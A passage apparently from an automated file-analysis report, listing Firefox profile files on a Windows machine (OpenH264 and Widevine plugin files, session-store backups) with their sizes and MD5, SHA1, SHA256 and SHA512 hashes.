SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
8KB
MD5efdd75f8141d723678757bd0f6a696e0
SHA1d2327da412d48473afa059b6e58866eed15fc45a
SHA25662c503dd2453f4fd405ec22acbc1931e0e445137b3a349d35e7f131233634fa0
SHA51239597d5f351dee7281617ce63b7743fbbabcf65073d92b593c88be1db2102e0259b9386bdc515a3719f8b8c6fd0a6f1c51c9d9c8fe32dfb297d4947ebbe27e26
-
Filesize
6KB
MD5fbde16cb53dc53520ba6a194e051bd8a
SHA166cb60961947c4b508f8910723483935d1b2f899
SHA256ac956d63579812881f2ec58d37026f1bcfa8f3660127625eea383479eda29db3
SHA512fc7f2e596f22f72ad36747c3dd2cba44806b08d6195413397bc646e5a9b35de9c1540f090dca4fca60fe782025101372b18f8671ee8b12275d0e6958a71cc0cd
-
Filesize
6KB
MD5b637f43f93e9886ebae14988e5fd6526
SHA1ea9e64f495d72df1885a8d006199792c462e87a9
SHA2561ded65cff1e57c4764ec061216e75d2e7e0b4d057a2293735d180fcaed9eaa63
SHA512412cfe52a6d522d1cf4b3ffe449cb2088f89ab80455103e0be7218c9b87b6189d963772a761ea591289976df774e947744eac892705714cf3a83c16710238447
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iauxn5db.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5a5b302613c82924a07c34f99e647f198
SHA1529e2e3d021a60962910af54dd7cf96f2e62e114
SHA2561f6414a962a3f874ebdab96e53f298bf2a9efe7d4692864754da8959a4d4a5fa
SHA51282dc4d3a5f1a6246d7e34c591b0ad59f0f15f82f09f275f4d7291eda9aafe2945ab4c8dc40ee07af98168dffab9fe25c928529ad0a2e4ce1b53e31cf420ac1de